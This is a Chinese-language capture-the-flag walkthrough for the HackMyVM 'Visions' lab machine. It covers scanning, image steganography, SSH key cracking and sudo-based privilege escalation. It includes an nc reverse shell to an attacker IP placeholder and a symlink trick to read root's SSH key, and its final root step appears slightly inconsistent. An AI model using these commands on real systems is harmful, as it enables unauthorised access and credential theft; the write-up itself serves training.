hackmyvm系列11——visions
字数 1153 2025-08-12 11:34:21
HackMyVM系列11——Visions靶机渗透教学文档
靶机概述
Visions是HackMyVM系列的第11个靶机,难度中等,涉及信息收集、隐写术、权限提升等技术点。本教学文档将详细讲解渗透过程。
信息收集阶段
1. 端口扫描
使用Nmap进行全端口扫描:
nmap -sV -Pn -sC -A 192.168.56.184 -p 0-65535
2. 目录扫描
使用Gobuster进行目录爆破:
gobuster dir -u http://192.168.56.184/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,html
注:初始扫描可能未发现有用信息
3. 网页源代码分析
查看网页源代码发现:
- 用户名:
alicia - 页面使用白色图片作为背景
4. 隐写术分析
下载白色图片并检查隐藏信息:
wget http://192.168.56.184/white.png
zsteg white.png
发现隐藏的密码信息
初始访问
1. SSH登录
使用发现的凭据登录:
ssh alicia@192.168.56.184
用户名:alicia,密码从图片隐写获取
权限提升阶段
1. 初始提权尝试
上传常用提权脚本进行检测:
# 上传linpeas或其他提权脚本
chmod +x linpeas.sh
./linpeas.sh
可能未发现直接可利用的漏洞
2. SUID检查
查找具有SUID权限的文件:
find / -perm -u=s -type f 2>/dev/null
未发现可直接利用的SUID文件
3. Sudo权限检查
检查当前用户的sudo权限:
sudo -l
发现可以以emma用户身份执行nc
4. 利用nc反弹shell
利用sudo权限获取emma用户的shell:
sudo -u emma nc -e /bin/sh [攻击机IP] [监听端口]
在攻击机监听:
nc -lvnp [监听端口]
5. 稳定shell获取
获取更稳定的shell:
python3 -c "import pty;pty.spawn('/bin/bash');"
6. 进一步信息收集
重新检查图片文件,发现更多隐藏信息:
steghide extract -sf white.png
获得新密码:seemstobeimpossible
7. 切换到sophia用户
使用新密码登录:
su sophia
密码:seemstobeimpossible
8. 检查sophia的sudo权限
sudo -l
发现可以以isabella用户身份执行cat
9. 读取隐藏文件
尝试读取isabella用户的隐藏文件:
sudo -u isabella cat /home/isabella/.invisible
发现包含SSH密钥信息
10. 破解SSH密钥
使用john破解SSH密钥密码:
ssh2john id_rsa >> hash.txt
john hash.txt --wordlist=rockyou.txt
获得密码:invisible
11. 登录isabella账户
使用破解的密钥登录:
ssh -i id_rsa isabella@localhost
密码:invisible
12. 最终提权
利用.invisible文件的特殊权限获取root权限:
ln -sf /root/.ssh/id_rsa .invisible
sudo -u root cat /home/isabella/.invisible
获取root的SSH私钥
13. 以root身份登录
使用获取的root私钥登录:
ssh -i root_id_rsa root@localhost
关键知识点总结
- 隐写术分析:使用zsteg和steghide工具分析图片中的隐藏信息
- 权限提升路径:
- alicia → emma (通过sudo nc)
- emma → sophia (通过图片隐藏密码)
- sophia → isabella (通过sudo cat)
- isabella → root (通过.invisible文件链接)
- SSH密钥破解:使用ssh2john和john工具破解加密的SSH私钥
- 符号链接利用:通过创建符号链接绕过权限限制读取root私钥
防御建议
- 避免在图片等非文本文件中存储敏感信息
- 限制sudo权限,避免过度授权
- 对SSH私钥使用强密码保护
- 定期检查系统上的SUID文件和特殊权限设置
- 监控系统上的符号链接创建行为